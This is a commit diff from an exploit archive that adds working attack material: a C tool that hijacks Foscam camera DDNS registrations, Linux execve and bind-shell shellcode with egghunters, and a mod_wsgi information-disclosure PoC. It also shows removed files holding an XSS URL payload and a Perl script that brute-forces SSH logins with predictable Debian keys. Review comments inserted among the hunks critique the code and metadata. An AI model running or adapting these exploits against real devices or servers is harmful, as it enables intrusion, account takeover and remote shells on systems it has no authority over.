DB: 2016-01-09

10 new exploits
Offensive Security 2016-01-09 05:02:44 +00:00
parent 97940c47e2
commit 86d0c5fe16
15 changed files with 781 additions and 376 deletions


@ -5246,7 +5246,7 @@ id,file,description,date,author,platform,type,port
5619,platforms/windows/remote/5619.html,"Microsoft Internet Explorer (Print Table of Links) Cross-Zone Scripting PoC",2008-05-14,"Aviv Raff",windows,remote,0
5620,platforms/php/webapps/5620.txt,"rgboard <= 3.0.12 (rfi/XSS) Multiple Vulnerabilities",2008-05-14,e.wiZz!,php,webapps,0
5621,platforms/php/webapps/5621.txt,"Kostenloses Linkmanagementscript (page_to_include) RFI Vulnerability",2008-05-14,HaCkeR_EgY,php,webapps,0
5622,platforms/multiple/remote/5622.txt,"Debian OpenSSL - Predictable PRNG Bruteforce SSH Exploit (Perl)",2008-05-15,"Markus Mueller",multiple,remote,22
5622,platforms/linux/remote/5622.txt,"Debian OpenSSL - Predictable PRNG Bruteforce SSH Exploit (Perl)",2008-05-15,"Markus Mueller",linux,remote,22
5623,platforms/php/webapps/5623.txt,"Kostenloses Linkmanagementscript SQL Injection Vulnerabilities",2008-05-15,"Virangar Security",php,webapps,0
5624,platforms/php/webapps/5624.txt,"newsmanager 2.0 (rfi/rfd/sql/pb) Multiple Vulnerabilities",2008-05-15,GoLd_M,php,webapps,0
5625,platforms/windows/local/5625.c,"Symantec Altiris Client Service 6.8.378 - Local Privilege Escalation Exploit",2008-05-15,"Alex Hernandez",windows,local,0
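Review bot: the 5622 row is re-pointed from platforms/multiple/remote/5622.txt to platforms/linux/remote/5622.txt, but this commit only deletes the old file (the @ -1,53 +0,0 hunk further down); its 781 additions are fully accounted for by the new exploit files and the csv rows shown, so nothing is created at the new path. Unless platforms/linux/remote/5622.txt already exists, the index now references a missing file. The same applies to the 5632 row in the next hunk and its @ -1,78 +0,0 deletion. The commit message "10 new exploits" should also mention the two platform reclassifications.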
@ -5256,7 +5256,7 @@ id,file,description,date,author,platform,type,port
5629,platforms/php/webapps/5629.txt,"Web Slider <= 0.6 - Insecure Cookie/Authentication Handling Vuln",2008-05-15,t0pP8uZz,php,webapps,0
5630,platforms/php/webapps/5630.txt,"Multi-Page Comment System 1.1.0 Insecure Cookie Handling Vulnerability",2008-05-15,t0pP8uZz,php,webapps,0
5631,platforms/php/webapps/5631.txt,"IMGallery 2.5 Multiply Remote SQL Injection Vulnerabilities",2008-05-15,cOndemned,php,webapps,0
5632,platforms/multiple/remote/5632.rb,"Debian OpenSSL - Predictable PRNG Bruteforce SSH Exploit (Ruby)",2008-05-16,L4teral,multiple,remote,22
5632,platforms/linux/remote/5632.rb,"Debian OpenSSL - Predictable PRNG Bruteforce SSH Exploit (Ruby)",2008-05-16,L4teral,linux,remote,22
5633,platforms/asp/webapps/5633.pl,"StanWeb.CMS (default.asp id) Remote SQL Injection Exploit",2008-05-16,JosS,asp,webapps,0
5634,platforms/php/webapps/5634.htm,"Zomplog <= 3.8.2 (newuser.php) Arbitrary Add Admin Exploit",2008-05-16,ArxWolf,php,webapps,0
5635,platforms/php/webapps/5635.pl,"Archangel Weblog 0.90.02 (post_id) SQL Injection Exploit",2008-05-16,Stack,php,webapps,0
@ -35408,6 +35408,7 @@ id,file,description,date,author,platform,type,port
39156,platforms/cgi/webapps/39156.txt,"ZamFoo Multiple Remote Command Execution Vulnerabilities",2014-04-02,Al-Shabaab,cgi,webapps,0
39157,platforms/php/webapps/39157.txt,"Puntopy 'novedad.php' SQL Injection Vulnerability",2014-04-06,"Felipe Andrian Peixoto",php,webapps,0
39159,platforms/windows/local/39159.py,"FTPShell Client 5.24 - Add to Favorites Buffer Overflow",2016-01-04,INSECT.B,windows,local,0
39160,platforms/lin_x86/shellcode/39160.c,"Linux/x86 execve _/bin/sh_ - shellcode 24 byte",2016-01-04,"Dennis 'dhn' Herrmann",lin_x86,shellcode,0
39161,platforms/windows/remote/39161.py,"Rejetto HTTP File Server (HFS) 2.3.x - Remote Command Execution",2016-01-04,"Avinash Thapa",windows,remote,0
39162,platforms/multiple/dos/39162.txt,"pdfium CPDF_DIBSource::DownSampleScanline32Bit - Heap-Based Out-of-Bounds Read",2016-01-04,"Google Security Research",multiple,dos,0
39163,platforms/multiple/dos/39163.txt,"pdfium CPDF_TextObject::CalcPositionData - Heap-Based Out-of-Bounds Read",2016-01-04,"Google Security Research",multiple,dos,0
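Review bot: this hunk grows the block by one row, presumably 39160, whose file platforms/lin_x86/shellcode/39160.c is added further down in this commit; that file's own header gives the date as 2015-01-03 while the row says 2016-01-04, so one of them needs correcting (the 2016 value fits the neighbouring rows). The id sequence here also jumps from 39157 to 39159 without comment, and the underscores in "execve _/bin/sh_" look like a quoting artefact rather than part of the title.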
@ -35441,3 +35442,12 @@ id,file,description,date,author,platform,type,port
39192,platforms/hardware/webapps/39192.rb,"D-Link DCS-931L File Upload",2016-01-07,metasploit,hardware,webapps,0
39193,platforms/java/webapps/39193.txt,"OpenMRS Reporting Module 0.9.7 - Remote Code Execution",2016-01-07,"Brian D. Hysell",java,webapps,0
39194,platforms/hardware/webapps/39194.txt,"AVM FRITZ!Box < 6.30 - Buffer Overflow",2016-01-07,"RedTeam Pentesting",hardware,webapps,0
39195,platforms/hardware/remote/39195.c,"Foscam IP Camera Predictable Credentials Security Bypass Vulnerability",2014-05-08,"Sergey Shekyan",hardware,remote,0
39196,platforms/linux/remote/39196.py,"Apache 'mod_wsgi' Module Information Disclosure Vulnerability",2014-05-21,"Buck Golemon",linux,remote,0
39197,platforms/php/webapps/39197.txt,"WordPress Booking System (Booking Calendar) Plugin 'booking_form_id' SQL Injection Vulnerability",2014-05-21,maodun,php,webapps,0
39198,platforms/php/webapps/39198.html,"User Cake Cross Site Request Forgery Vulnerability",2014-05-25,"Dolev Farhi",php,webapps,0
39199,platforms/python/webapps/39199.html,"Pyplate 'addScript.py' Cross Site Request Forgery Vulnerability",2014-05-23,"Henri Salo",python,webapps,0
39200,platforms/php/webapps/39200.txt,"PHP-Nuke 'Submit_News' Component SQL Injection Vulnerability",2014-05-24,"ali ahmady",php,webapps,0
39202,platforms/php/webapps/39202.txt,"WP Symposium Pro Social Network Plugin 15.12 - Multiple Vulnerabilities",2016-01-08,"Rahul Pratap Singh",php,webapps,0
39203,platforms/lin_x86-64/shellcode/39203.c,"x86_64 Linux Egghunter - 18 bytes",2016-01-08,"Sathish kumar",lin_x86-64,shellcode,0
39204,platforms/lin_x86/shellcode/39204.c,"Linux x86 - Egg-hunter (13 bytes)",2016-01-08,"Dennis 'dhn' Herrmann",lin_x86,shellcode,0
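Review bot: the nine added rows interleave SecurityFocus imports dated 2014 (39195 to 39200) with three 2016 submissions and skip id 39201 without comment; the commit message "10 new exploits" should say how many of these are back-dated imports. The 39204 row also says 2016-01-08 while the header inside the added 39204.c says 2015-01-07, and the two egghunter titles use different styles ("Egghunter - 18 bytes" versus "Egg-hunter (13 bytes)").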


@ -1,9 +0,0 @@
source: http://www.securityfocus.com/bid/13522/info
MegaBook is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input.
An attacker may leverage this issue to have arbitrary script code executed in the browser of an unsuspecting user. This may facilitate the theft of cookie-based authentication credentials as well as other attacks.
This issue is reported to affect MegaBook version 2.0; other versions may also be vulnerable.
http://www.example.com/admin.cgi?action=modifypost&entryid=">&lt;script&gt;alert('wvs-xss-magic-string-703410097');&lt;/script&gt;
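Review bot: this deletes the MegaBook XSS note (BID 13522 per its source line) but the commit message does not mention any removal, and no files.csv hunk in this commit drops a matching row (the commit's 376 deletions are covered by the four removed files plus the two replaced 5622/5632 csv rows), so the index may still reference the removed file. Record why the entry was retired (duplicate, reclassified) and drop its row in the same commit.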

platforms/hardware/remote/39195.c Executable file

@ -0,0 +1,363 @@
source: http://www.securityfocus.com/bid/67510/info
Foscam IP Camera is prone to a security-bypass vulnerability.
An attacker can exploit this issue to gain access to sensitive information and perform certain unauthorized actions; this may lead to further attacks.
Foscam IP Camera 11.37.2.49 and prior versions are vulnerable.
/*
* Copyright 2013 Artem Harutyunyan, Sergey Shekyan
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*
*/
#include <string.h>
#include <getopt.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/errno.h>
#include <arpa/inet.h>
#include <netdb.h>
#include "camtool.h"
#define IP_BUF_LEN 16
#define RESP_BUF_LEN 1024
#define PORT_BUF_LEN 6
#define UNAME_LEN 6
#define DELIM 0x1
#define REQ_POS_PID 1
#define REQ_POS_UNAME 2
#define REQ_POS_PWD 3
#define REQ_POS_OEM 4
#define REQ_POS_DOMAIN_COUNT 5
#define REQ_POS_DOMAIN_0 6
#define RES_POS_PID 1
#define RES_POS_ERROR 2
#define RES_POS_MSG 3
#define RES_POS_DOMAIN_COUNT 4
#define RES_POS_DOMAIN_0 5
#define RES_ENT_SRV_COUNT 6
#define RES_ENT_SRV_0 7
#define RES_ENT_SRV_MPORT_0 8
#define RES_ENT_SRV_APORT_0 9
#define KEY_PID "PID"
#define KEY_UNAME "UName"
#define KEY_PWD "PWD"
#define KEY_OEM "OEM"
#define KEY_DOMAIN_COUNT "DomainCount"
#define KEY_DOMAIN_0 "Domain0"
#define KEY_ENT_SRV_0 "EntServer0"
#define KEY_ENT_SRV_MPORT_0 "EntServerMPort0"
static char initial_payload[] = {
0x01, 0x50, 0x49, 0x44, 0x3d, 0x31, 0x34, 0x01, 0x55, 0x4e, 0x61, 0x6d,
0x65, 0x3d, 0x63, 0x68, 0x31, 0x32, 0x36, 0x36, 0x01, 0x50, 0x57, 0x44,
0x3d, 0x63, 0x68, 0x31, 0x32, 0x36, 0x36, 0x01, 0x4f, 0x45, 0x4d, 0x3d,
0x72, 0x65, 0x65, 0x63, 0x61, 0x6d, 0x01, 0x44, 0x6f, 0x6d, 0x61, 0x69,
0x6e, 0x43, 0x6f, 0x75, 0x6e, 0x74, 0x3d, 0x31, 0x01, 0x44, 0x6f, 0x6d,
0x61, 0x69, 0x6e, 0x30, 0x3d, 0x63, 0x68, 0x31, 0x32, 0x36, 0x36, 0x2e,
0x6d, 0x79, 0x66, 0x6f, 0x73, 0x63, 0x61, 0x6d, 0x2e, 0x6f, 0x72, 0x67,
0x01, 0x00
};
static const unsigned int n_initial_payload = 85;
static char redirect_payload[] = {
0x01, 0x50, 0x49, 0x44, 0x3d, 0x31, 0x30, 0x01, 0x55, 0x4e, 0x61, 0x6d,
0x65, 0x3d, 0x63, 0x68, 0x31, 0x32, 0x36, 0x36, 0x01, 0x50, 0x57, 0x44,
0x3d, 0x63, 0x68, 0x31, 0x32, 0x36, 0x36, 0x01, 0x4f, 0x45, 0x4d, 0x3d,
0x72, 0x65, 0x65, 0x63, 0x61, 0x6d, 0x01, 0x4f, 0x53, 0x3d, 0x4c, 0x69,
0x6e, 0x75, 0x78, 0x01, 0x42, 0x75, 0x69, 0x6c, 0x64, 0x4e, 0x4f, 0x3d,
0x31, 0x33, 0x38, 0x30, 0x01, 0x44, 0x6f, 0x6d, 0x61, 0x69, 0x6e, 0x30,
0x3d, 0x63, 0x68, 0x31, 0x32, 0x36, 0x36, 0x2e, 0x6d, 0x79, 0x66, 0x6f,
0x73, 0x63, 0x61, 0x6d, 0x2e, 0x6f, 0x72, 0x67, 0x01, 0x0
};
static const unsigned int n_redirect_payload = 93;
static int
payload_get_offset_by_name(const char* name, const char buf[0], const unsigned int n_buf)
{
const unsigned int n_name = strlen(name);
unsigned int i_name = 0;
unsigned int i = 0;
while (i < n_buf) {
while (name[i_name] == buf[i + i_name] && ((i + i_name) < n_buf) && (i_name < n_name))
++i_name;
if (i_name == n_name)
return i;
else
i_name = 0;
++i;
}
return -1;
}
static int
payload_insert_host(const char* host, const char* buf, const unsigned int n_buf)
{
unsigned int i = 0;
unsigned int n_host = strlen(host);
int offset = 0;
// Make sure that hostname is exactly UNAME_LEN
while (i < n_host && (buf[++i] != DELIM)) {}
if (i != (UNAME_LEN + 1)) return -1;
// Insert hostname to payload
if ((offset = payload_get_offset_by_name(KEY_UNAME, buf, n_buf)) == -1) return 1;
memmove((void*) &buf[offset + strlen(KEY_UNAME) + 1], (const void*) host, UNAME_LEN);
// Insert pwd to payload
if ((offset = payload_get_offset_by_name(KEY_PWD, buf, n_buf)) == -1) return 1;
memmove((void*) &buf[offset + strlen(KEY_PWD) + 1], (const void*) host, UNAME_LEN);
// Insert domain to payload
if ((offset = payload_get_offset_by_name(KEY_DOMAIN_0, buf, n_buf)) == -1 || (offset + n_host) >= n_buf) return 1;
memmove((void*) &buf[offset + strlen(KEY_DOMAIN_0) + 1], (const void*) host, n_host);
return 0;
}
static int
payload_extract_ent_srv_0(const char** ip, unsigned int* n_ip, const char* payload, const unsigned int n_payload)
{
unsigned int offset = payload_get_offset_by_name(KEY_ENT_SRV_0, payload, n_payload);
const unsigned int n_key_ent_srv = strlen(KEY_ENT_SRV_0);
if (memcmp(&payload[offset], KEY_ENT_SRV_0, n_key_ent_srv) != 0)
return 1;
offset += (n_key_ent_srv + 1); // +1 for '='
unsigned int ip_offset = offset;
while (offset < n_payload && payload[offset] != DELIM)
++offset;
if (offset == n_payload)
return 1;
*ip = &payload[ip_offset];
*n_ip = offset - ip_offset;
return 0;
}
static int
payload_extract_ent_srv_port(const char** port_fwd, unsigned int* n_port_fwd, const char* payload, const unsigned int
n_payload)
{
unsigned int offset = payload_get_offset_by_name(KEY_ENT_SRV_MPORT_0, payload, n_payload);
const unsigned int n_key_ent_srv_mport = strlen(KEY_ENT_SRV_MPORT_0);
if (memcmp(&payload[offset], KEY_ENT_SRV_MPORT_0, n_key_ent_srv_mport) != 0)
return 1;
offset += (n_key_ent_srv_mport + 1); // +1 for '='
unsigned int mport_offset = offset;
while (offset < n_payload && payload[offset] != DELIM)
++offset;
if (offset == n_payload)
return 1;
*port_fwd = &payload[mport_offset];
*n_port_fwd = offset - mport_offset;
return 0;
}
static int
send_udp_payload (const char* payload, const unsigned int n_payload, const char* host, const unsigned short port,
int* sockfd, struct addrinfo** r)
{
/* Create socket and get the data from DDNS server */
struct addrinfo hints = {0};
struct addrinfo* res = *r;
int ret = 0;
int nbytes = 0;
hints.ai_family = AF_INET;
hints.ai_socktype = SOCK_DGRAM;
if ((ret = getaddrinfo(host, NULL, &hints, &res)) != 0) {
fprintf(stderr, "getaddrinfo: %s\n", gai_strerror(ret));
return 1;
}
if ((*sockfd = socket(res->ai_family, res->ai_socktype, res->ai_protocol)) == -1) {
fprintf(stderr, "socket() failed: %s\n", strerror(errno));
return 1;
}
struct sockaddr_in *ipv4 = (struct sockaddr_in*) res->ai_addr;
ipv4->sin_port = htons(port);
/* Send the request */
if ((nbytes = sendto(*sockfd, payload, n_payload, 0, res->ai_addr, sizeof *(res->ai_addr))) != n_payload) {
fprintf(stderr, "sendto() failed: %s\n", strerror(errno));
return 1;
}
*r = res;
return 0;
}
static void
usage()
{
fprintf(stdout,
"Tool for packing WebUI firmware.\n"
"Usage: uipack -d <dir> -o <output file>\n"
"\t-s DDNS server name\n"
"\t-a camera hostname\n"
"\t-i IP address to register\n"
"\t-h print this message\n");
}
int
main( int argc, char** argv)
{
if (argc < 4) {
usage();
return 1;
}
char ddns[MAX_HOSTNAME_LEN] = {0};
char camera_name[MAX_HOSTNAME_LEN] = {0};
char ip[IP_BUF_LEN] = {0};
char o = 0;
while ((o = getopt(argc, argv, ":s:a:i:h")) != -1) {
switch(o) {
case 's':
if (strlen(optarg) > MAX_HOSTNAME_LEN - 1) {
fprintf(stderr, "%s can not be longer than %d\n", optarg, MAX_HOSTNAME_LEN - 1);
return 1;
}
strncpy(ddns, optarg, MAX_HOSTNAME_LEN);
break;
case 'a':
if (strlen(optarg) > MAX_HOSTNAME_LEN - 1) {
fprintf(stderr, "%s can not be longer than %d\n", optarg, MAX_HOSTNAME_LEN - 1);
return 1;
}
strncpy(camera_name, optarg, MAX_HOSTNAME_LEN);
break;
case 'i':
if (strlen(optarg) > IP_BUF_LEN - 1) {
fprintf(stderr, "%s can not be longer than %d\n", optarg, IP_BUF_LEN - 1);
return 1;
}
strncpy(ip, optarg, IP_BUF_LEN);
break;
case 'h':
usage();
return 0;
case '?':
fprintf(stderr, "Illegal option -%c\n", optopt);
usage();
return 1;
defalt:
fprintf(stderr, "Option -%c requires an argument.\n", optopt);
usage();
return 1;
}
}
if (strlen(ddns) == 0|| strlen(camera_name) == 0 || strlen(ip) == 0) {
usage();
return 1;
}
/* Insert hostname into payload */
if (payload_insert_host(camera_name, initial_payload, n_initial_payload) != 0) {
fprintf(stderr, "Could not insert hostname into the payload");
return 1;
}
/* Send payload to DDNS */
int sockfd = 0;
struct addrinfo* res = NULL;
if (send_udp_payload (initial_payload, n_initial_payload, ddns, 8080, &sockfd, &res) != 0) {
fprintf(stderr, "Could not send UDP payload to %s", ddns);
return 1;
}
/* Get the response */
char resp[RESP_BUF_LEN] = {0};
int n_resp;
unsigned int fromlen = sizeof *(res->ai_addr);
if ((n_resp = recvfrom(sockfd, resp, RESP_BUF_LEN, 0, res->ai_addr, &fromlen)) == -1) {
fprintf(stderr, "recvfrom() failed: %s\n", strerror(errno));
return 1;
}
fprintf(stderr, "Got %d bytes\n", n_resp);
freeaddrinfo(res);
/* Make sure it's a redirect */
/* Extract the server name */
const char* ip_fwd = NULL;
unsigned int n_ip_fwd = 0;;
char str_ip_fwd[IP_BUF_LEN] = {0};
if (payload_extract_ent_srv_0(&ip_fwd, &n_ip_fwd, resp, n_resp) != 0) {
fprintf(stderr, "Could not extract IP server from the response\n");
return 1;
}
memmove(str_ip_fwd, ip_fwd, n_ip_fwd);
fprintf(stderr, "IP of the redirect server is: %s\n", str_ip_fwd);
/* Extract port */
const char* port_fwd = 0;
unsigned int n_port_fwd = 0;
char str_port_fwd[PORT_BUF_LEN] = {0};
if (payload_extract_ent_srv_port(&port_fwd, &n_port_fwd, resp, n_resp) != 0) {
fprintf(stderr, "Could not extract port from the response\n");
return 1;
}
memmove(str_port_fwd, port_fwd, n_port_fwd);
fprintf(stderr, "Port of the redirect server is: %s\n", str_port_fwd);
/* Update redirect payload and send to DDNS */
if (payload_insert_host(camera_name, redirect_payload, n_redirect_payload) != 0) {
fprintf(stderr, "Could not insert hostname into the redirect payload");
return 1;
}
sockfd = 0;
res = NULL;
if (send_udp_payload(redirect_payload, n_redirect_payload, str_ip_fwd, atoi(str_port_fwd), &sockfd, &res) != 0) {
fprintf(stderr, "Could not send UDP payload to %s", str_ip_fwd);
return 1;
}
return 0;
}
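Review bot: payload_extract_ent_srv_0 and payload_extract_ent_srv_port store the int result of payload_get_offset_by_name in an unsigned int, so a -1 (key not present in the response) becomes a huge offset and the following memcmp(&payload[offset], ...) reads far outside resp; test for -1 before indexing, e.g. `int offset = payload_get_offset_by_name(...); if (offset < 0) return 1;`. In main, the switch label `defalt:` is a misspelling of `default:`, so the missing-argument return (':' from the ":s:a:i:h" optstring) never prints its intended message and only surfaces later as a generic usage error. The usage text describes a different tool ("Tool for packing WebUI firmware", "uipack -d <dir> -o <output file>") and should list this program's -s/-a/-i options instead. The file includes "camtool.h" for MAX_HOSTNAME_LEN, which this commit does not add, so it does not build as committed; either add the header or define the constant locally. Also, payload_insert_host takes `const char* buf` and then writes through it with memmove, so the const should be dropped, and the comment "Make sure it's a redirect" is followed by no check of the RES_POS_ERROR field.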


@ -0,0 +1,50 @@
/*---------------------------------------------------------------------------------------------------------------------
/*
*Title: x86_64 Linux egghunter in 18 bytes
*Author: Sathish kumar
*Contact: https://www.linkedin.com/in/sathish94
*Description: x86_64 linux egghunter which searches for the marker.
*Copyright: (c) 2016 iQube. (http://iQube.io)
*Release Date: January 7, 2016
*Tested On: Ubuntu 14.04 LTS
*SLAE64-1408
*Build/Run: gcc -fno-stack-protector -z execstack egghunter.c -o egghunter
*
*Nasm source:
*
*
global _start
_start:
egg:
inc rdx ; Address
push rdx ; pushing the value in the rdx to the stack
pop rdi ; sending rdx to rdi via stack
push 0x50905090 ; pusing the egg marker into the stack
pop rax
inc eax ; Real egg marker is 0x50905091 so the the eax register is increased bcz the marker shouldn't be hardcoded
scasd ; check if we have found the egg
jnz egg ; try the next byte in the memory
jmp rdi ; go to the shellcode
*Compile & Run: nasm -f elf64 -o egghunter.o egghunter.nasm
ld -o egghunter egghunter.o
*/
#include <stdio.h>
#include <string.h>
char hunter[] = \
"\x48\xff\xc2\x52\x5f\x68\x90\x50\x90\x50\x58\xff\xc0\xaf\x75\xf0\xff\xe7";
char execve_code_with_egg[] = \
//marker
"\x91\x50\x90\x50"
"\x48\x31\xc0\x50\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x53\x48\x89\xe7\x50\x48\x89\xe2\x57\x48\x89\xe6\x48\x83\xc0\x3b\x0f\x05";
int main(){
printf("Egg Hunter Length: %d\n", (int)strlen(hunter));
(*(void (*)()) hunter)();
return 0;
}
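Review bot: the hunter starts scanning from whatever rdx holds at entry and has no page-validity check (no access()-style probe before the scasd), so the first unmapped page it reaches faults instead of being skipped; the "Description" comment should state that limitation, and main() never points the hunter at execve_code_with_egg, so whether the scan reaches the egg depends on incidental register state. Minor: the header opens two comments in a row (`/*---` on the first line and `/*` on the next), which gcc flags with -Wcomment, and the `inc eax` comment reads "the the" and "bcz".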


@ -0,0 +1,78 @@
/*
; Title: Linux/x86 execve "/bin/sh" - shellcode 24 byte
; Platform: linux/x86
; Date: 2015-01-03
; Author: Dennis 'dhn' Herrmann
; Website: https://zer0-day.pw
BITS 32
global _start
section .text
; syscalls kernel
SYS_EXECVE equ 0x0b
_start:
; execve("/bin//sh", 0, 0);
push SYS_EXECVE ; SYS_EXECVE = 11
pop eax ; set SYS_EXECVE to eax
xor esi, esi ; clean esi
push esi ; esi is zero
push 0x68732f2f ; push 'hs//'
push 0x6e69622f ; push 'nib/'
; execve("/bin//sh/", 0, 0);
; ^
; |
; ebx
mov ebx, esp
; execve("/bin//sh/", 0, 0);
; ^
; |
; ecx
xor ecx, ecx ; clean ecx
; execve("/bin//sh/", 0, 0);
; ^
; |
; edx
mov edx, ecx ; set zero to edx
int 0x80 ; syscall execve
*/
/*
* $ gcc -fno-stack-protector -z execstack shellcode.c -o shellcode
* $ ./shellcode
* Shellcode Length: 24
* # id
* uid=0(root) gid=0(root) groups=0(root)
*/
#include <stdio.h>
#include <string.h>
char shellcode[] = {
"\x6a\x0b" /* push 0xb */
"\x58" /* pop eax */
"\x31\xf6" /* xor esi,esi */
"\x56" /* push esi */
"\x68\x2f\x2f\x73\x68" /* push 0x68732f2f */
"\x68\x2f\x62\x69\x6e" /* push 0x6e69622f */
"\x89\xe3" /* mov ebx,esp */
"\x31\xc9" /* xor ecx,ecx */
"\x89\xca" /* mov edx,ecx */
"\xcd\x80" /* int 0x80 */
};
int main()
{
printf("Shellcode Length: %d\n", (int)strlen(shellcode));
int (*ret)() = (int(*)())shellcode;
ret();
return 0;
}
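Review bot: the header date "2015-01-03" disagrees with the files.csv row for 39160 (2016-01-04) and with the other dates in this commit; fix the year. The byte array is initialised with a string literal wrapped in braces (`char shellcode[] = { "..." };`), which is legal but unusual; drop the braces to match the other shellcode files in this commit. The annotated nasm comments write the path as "/bin//sh/" with a trailing slash that is not in the pushed bytes ("/bin//sh").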


@ -0,0 +1,84 @@
/*
* Title: Egg Hunter PoC
* Platform: linux/x86
* Date: 2015-01-07
* Author: Dennis 'dhn' Herrmann
* Website: https://zer0-day.pw
* Github: https://github.com/dhn/SLAE/
* SLAE-721
*/
/*
* egg_hunter.nasm
* ---------------
* BITS 32
*
* global _start
* section .text
*
* EGG_SIG equ 0x4f904790 ; signature
*
* _start:
* cdq ; zero out edx
* mov edx, EGG_SIG ; edx = 0x4f904790
*
* search_the_egg:
* inc eax ; increment eax
* cmp DWORD [eax], edx ; compare eax with the EGG_SIG
* jne search_the_egg ; if not compare jump to search_the_egg
*
* jmp eax ; jump to eax
*
*/
#include <stdio.h>
#include <string.h>
/*
* Egg Signature:
*
* 0x4f 0x90 0x47 0x90
* | | | |
* dec edi - NOP - inc edi - NOP
*/
#define EGG_SIG "\x90\x47\x90\x4f"
unsigned char egg_hunter[] = \
"\x99" /* cdq */
"\xba\x90\x47\x90\x4f" /* mov edx, 0x4f904790 */
"\x40" /* inc eax */
"\x39\x10" /* cmp DWORD PTR [eax], edx */
"\x75\xfb" /* jne 6 <search_the_egg> */
"\xff\xe0"; /* jmp eax */
/*
* Bind Shell TCP shellcode - 96 byte
* bind to port: 1337
*/
unsigned char shellcode[] = \
EGG_SIG /* Egg Signature */
"\x6a\x66\x58\x6a\x01\x5b\x31\xf6"
"\x56\x6a\x01\x6a\x02\x89\xe1\xcd"
"\x80\x5f\x97\x93\xb0\x66\x56\x66"
"\x68\x05\x39\x66\x6a\x02\x89\xe1"
"\x6a\x10\x51\x57\x89\xe1\xcd\x80"
"\xb0\x66\xb3\x04\x56\x57\x89\xe1"
"\xcd\x80\xb0\x66\xb3\x05\x56\x56"
"\x57\x89\xe1\xcd\x80\x93\x31\xc9"
"\xb1\x03\xfe\xc9\xb0\x3f\xcd\x80"
"\x75\xf8\x6a\x0b\x58\x31\xc9\x51"
"\x68\x2f\x2f\x73\x68\x68\x2f\x62"
"\x69\x6e\x89\xe3\x89\xca\xcd\x80";
/*
* $ gcc -Wl,-z,execstack -fno-stack-protector PoC.c -o PoC
* [+] Egg Hunter Length: 13
* [+] Shellcode Length + 4 byte egg: 100
*
*/
void main()
{
printf("[+] Egg Hunter Length: %d\n", strlen(egg_hunter));
printf("[+] Shellcode Length + 4 byte egg: %d\n", strlen(shellcode));
int (*ret)() = (int(*)())egg_hunter;
ret();
}
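Review bot: the `cdq` at the start of egg_hunter is dead code, since the next instruction `mov edx, 0x4f904790` overwrites edx unconditionally; dropping it gives a 12-byte hunter, and the "13 bytes" in the title and the files.csv row would then need updating. `void main()` is not a standard signature and `%d` with the size_t from strlen() is a format mismatch; use `int main(void)` and `%zu`. The "Egg Signature" comment lists the bytes as 0x4f 0x90 0x47 0x90 (register order) while EGG_SIG is "\x90\x47\x90\x4f" (memory order); say which order is meant so readers do not invert the egg. The header date 2015-01-07 conflicts with the 2016-01-08 files.csv row.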

platforms/linux/remote/39196.py Executable file

@ -0,0 +1,49 @@
source: http://www.securityfocus.com/bid/67534/info
mod_wsgi is prone to a remote information-disclosure vulnerability.
Attackers can exploit this issue to obtain sensitive information that may aid in launching further attacks.
import functools
import threading
import time
import random
def run(*args):
while True:
items = []
for i in range(1000):
items.append((int(random.random()*20)*'X'))
time.sleep(0.00001)
thread = threading.Thread(target=run)
thread.start()
def headers():
return [('Content-Type', 'text/plain'.upper().lower())]
def response():
yield 'Hello World!\n'
_content_type_cache = {}
def intern_content_type(application):
@functools.wraps(application)
def _wrapper(environ, start_response):
def _start_response(status, headers, *args):
_headers = []
for header, value in headers:
if header.lower() == 'content-type':
value = _content_type_cache.setdefault(value, value)
_headers.append((header, value))
return start_response(status, _headers, *args)
return application(environ, _start_response)
return _wrapper
#@intern_content_type
def application(environ, start_response):
status = '200 OK'
start_response(status, headers())
return response()
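Review bot: nothing in the file says how it reproduces the mod_wsgi information disclosure the source text describes: the background thread churning string allocations, the freshly built 'text/plain'.upper().lower() header value and the commented-out `@intern_content_type` decorator all look deliberate, but without a comment a reader cannot tell which is the trigger and which is the workaround. Add a short header giving the expected symptom and stating that uncommenting the decorator is the mitigation, if that is the intent. The thread started at import time is non-daemon and loops forever, so any WSGI server importing this module will not exit cleanly; set `thread.daemon = True` before `start()`.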


@ -1,53 +0,0 @@
the debian openssl issue leads that there are only 65.536 possible ssh
keys generated, cause the only entropy is the pid of the process
generating the key.
This leads to that the following perl script can be used with the
precalculated ssh keys to brute force the ssh login. It works if such a
keys is installed on a non-patched debian or any other system manual
configured to.
On an unpatched system, which doesn't need to be debian, do the following:
keys provided by HD Moore - http://metasploit.com/users/hdm/tools/debian-openssl/
1. Download http://sugar.metasploit.com/debian_ssh_rsa_2048_x86.tar.bz2
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/5622.tar.bz2 (debian_ssh_rsa_2048_x86.tar.bz2)
2. Extract it to a directory
3. Enter into the /root/.ssh/authorized_keys a SSH RSA key with 2048
Bits, generated on an upatched debian (this is the key this exploit will
break)
4. Run the perl script and give it the location to where you extracted
the bzip2 mentioned.
#!/usr/bin/perl
my $keysPerConnect = 6;
unless ($ARGV[1]) {
print "Syntax : ./exploiter.pl pathToSSHPrivateKeys SSHhostToTry\n";
print "Example: ./exploiter.pl /root/keys/ 127.0.0.1\n";
print "By mm@deadbeef.de\n";
exit 0;
}
chdir($ARGV[0]);
opendir(A, $ARGV[0]) || die("opendir");
while ($_ = readdir(A)) {
chomp;
next unless m,^\d+$,;
push(@a, $_);
if (scalar(@a) > $keysPerConnect) {
system("echo ".join(" ", @a)."; ssh -l root ".join(" ", map { "-i
".$_ } @a)." ".$ARGV[1]);
@a = ();
}
}
5. Enjoy the shell after some minutes (less than 20 minutes)
Regards,
Markus Mueller
mm@deadbeef.de
# milw0rm.com [2008-05-15]


@ -1,78 +0,0 @@
#!/usr/bin/ruby
#
# Debian SSH Key Tester
# L4teral <l4teral [at] gmail com>
#
# This tool helps to find user accounts with weak SSH keys
# that should be regenerated with an unaffected version
# of openssl.
#
# You will need the precalculated keys provided by HD Moore
# See http://metasploit.com/users/hdm/tools/debian-openssl/
# for further information.
#
# Common Keys:
#
